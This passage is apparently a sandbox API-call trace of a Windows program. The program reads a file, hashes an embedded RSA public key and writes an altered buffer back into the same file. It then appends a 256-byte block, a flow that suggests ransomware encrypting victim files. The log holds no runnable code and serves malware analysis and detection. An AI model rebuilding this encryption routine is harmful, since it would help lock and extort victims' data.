lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.611] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.611] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x493, lpOverlapped=0x0) returned 1 [0203.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.611] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.611] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.612] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.612] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.612] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.612] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.612] GetLastError () returned 0x0 [0203.612] SetLastError (dwErrCode=0x0) [0203.612] GetLastError () returned 0x0 [0203.612] SetLastError (dwErrCode=0x0) [0203.612] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.613] GetLastError () returned 0x0 [0203.613] SetLastError (dwErrCode=0x0) [0203.613] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] GetLastError () returned 0x0 [0203.614] SetLastError (dwErrCode=0x0) [0203.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.615] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.615] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.615] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.615] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.615] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x490) returned 0x3310808 [0203.615] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310ca0 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cedc8 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcc8 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x329bf8 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc98 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.615] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x3b80690 [0203.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b808b0 [0203.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808b0 | out: hHeap=0x2c0000) returned 1 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd88 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdc68 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x32b69d8 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b67078 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.616] GetCurrentThreadId () returned 0x600 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3233a0 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.617] GetCurrentThreadId () returned 0x600 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66498 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcb0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0203.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b672a8 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd28 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b80690 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x32b69d8 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b67190 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b808a8 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0203.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66180 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66288 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808a8 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdce0 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd88 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcb0 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66390 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc98 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329bf8 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66498 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310ca0 | out: hHeap=0x2c0000) returned 1 [0203.620] WriteFile (in: hFile=0x63c, lpBuffer=0x3310808*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3310808*, lpNumberOfBytesWritten=0x39cfb14*=0x48e, lpOverlapped=0x0) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.620] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.620] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0203.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 